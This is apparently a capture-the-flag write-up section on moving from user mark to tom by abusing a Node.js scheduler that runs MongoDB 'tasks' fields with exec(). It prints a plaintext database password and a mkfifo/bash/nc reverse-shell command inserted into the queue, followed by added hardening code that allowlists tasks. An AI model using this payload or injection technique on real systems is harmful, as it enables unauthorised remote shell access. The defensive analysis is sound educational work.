# 5 mark > tom

```
# explored a lot of stuff
# reusing password
# connecting to mongo failed with mark creds

# looking at processes running as tom

mark@node:/opt$ ps fuaxwww | grep tom
mark     23909  0.0  0.1  14228   940 pts/0    S+   19:15   0:00              \_ grep --color=auto tom
tom       1225  5.5  5.7 1045320 43720 ?       Ssl  18:20   3:01 /usr/bin/node /var/www/myplace/app.js
tom       1229  0.0  4.0 1074616 30708 ?       Ssl  18:20   0:01 /usr/bin/node /var/scheduler/app.js
```

```js
// mark@node:/opt$ cat /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});
```

```
# this script behaves like a cron job: every 30 seconds it reads all records in the 'tasks' collection,
# passes each record's 'cmd' value to exec() (the process runs as tom), then deletes the record.

$ mongosh --host localhost -u mark -p 5AYRft73VtFpc84k scheduler
Current Mongosh Log ID: 614a235a4a2af76aa870faa9
Connecting to:          mongodb://localhost:27017/scheduler?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB:          3.2.16
Using Mongosh:          1.0.6

scheduler> show dbs
MongoServerError: not authorized on admin to execute command { listDatabases: 1 }
scheduler> show collections
tasks
scheduler> db.tasks.find({})

scheduler> db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f"})
DeprecationWarning: Collection.insert() is deprecated. Use insertOne, insertMany, or bulkWrite.
{
  acknowledged: true,
  insertedIds: { '0': ObjectId("614a24be65c51bfc6927c5cc") }
}
scheduler> db.tasks.find({})
[
  {
    _id: ObjectId("614a24be65c51bfc6927c5cc"),
    cmd: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f'
  }
]

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.58] 32822
bash: cannot set terminal process group (1229): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ whoami;id
whoami;id
tom
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
```
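The root cause is that `/var/scheduler/app.js` hands a database field straight to `exec()`, so anyone who can write to `tasks` runs commands as tom. The sketch below is an added example, not code from the box or the original writeup: it shows a hardened dispatch step that maps task names to fixed commands and runs them with `execFile` (no shell). The `{task, params}` document shape, the task names and the file paths are assumptions made for illustration.

```javascript
// Added example: hardened task dispatch for a scheduler like /var/scheduler/app.js.
// Task names, binaries, paths and the {task, params} shape are hypothetical.
const { execFile } = require('child_process');

// Allowlist: task name -> fixed binary plus a builder for its argv.
const TASKS = {
  'rotate-logs': { file: '/usr/sbin/logrotate', args: () => ['/etc/logrotate.conf'] },
  'backup-site': {
    file: '/usr/bin/tar',
    // Only an 8-digit label may vary; anything else rejects the task.
    args: (p) => (typeof p.label === 'string' && /^[0-9]{8}$/.test(p.label))
      ? ['-czf', `/var/backups/site-${p.label}.tgz`, '/var/www/myplace']
      : null,
  },
};

// Turn an untrusted document from the tasks collection into a fixed command, or null.
function resolveTask(doc) {
  if (!doc || typeof doc.task !== 'string') return null; // old-style {cmd: ...} docs end here
  if (!Object.prototype.hasOwnProperty.call(TASKS, doc.task)) return null;
  const spec = TASKS[doc.task];
  const params = (doc.params && typeof doc.params === 'object') ? doc.params : {};
  const args = spec.args(params);
  return args ? { file: spec.file, args } : null;
}

// Run a resolved task without a shell, so metacharacters in argv are never interpreted.
function runTask(doc, done) {
  const cmd = resolveTask(doc);
  if (!cmd) return done(new Error('rejected task ' + JSON.stringify(doc)));
  execFile(cmd.file, cmd.args, { timeout: 60000 }, done);
}

// Constructed sample documents, as they might appear in the tasks collection.
const samples = [
  { cmd: 'id' },
  { task: 'rotate-logs' },
  { task: 'backup-site', params: { label: '20240101' } },
  { task: 'backup-site', params: { label: '20240101; id' } },
];
for (const doc of samples) {
  const cmd = resolveTask(doc);
  console.log(JSON.stringify(doc), '=>', cmd ? [cmd.file, ...cmd.args].join(' ') : 'REJECTED');
}
```

Dispatch hardening does not address the other finding on this page: the MongoDB credential sits in a source file another local user can read and grants write access to `tasks`, so file permissions and a separate, least-privilege database account are still needed.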


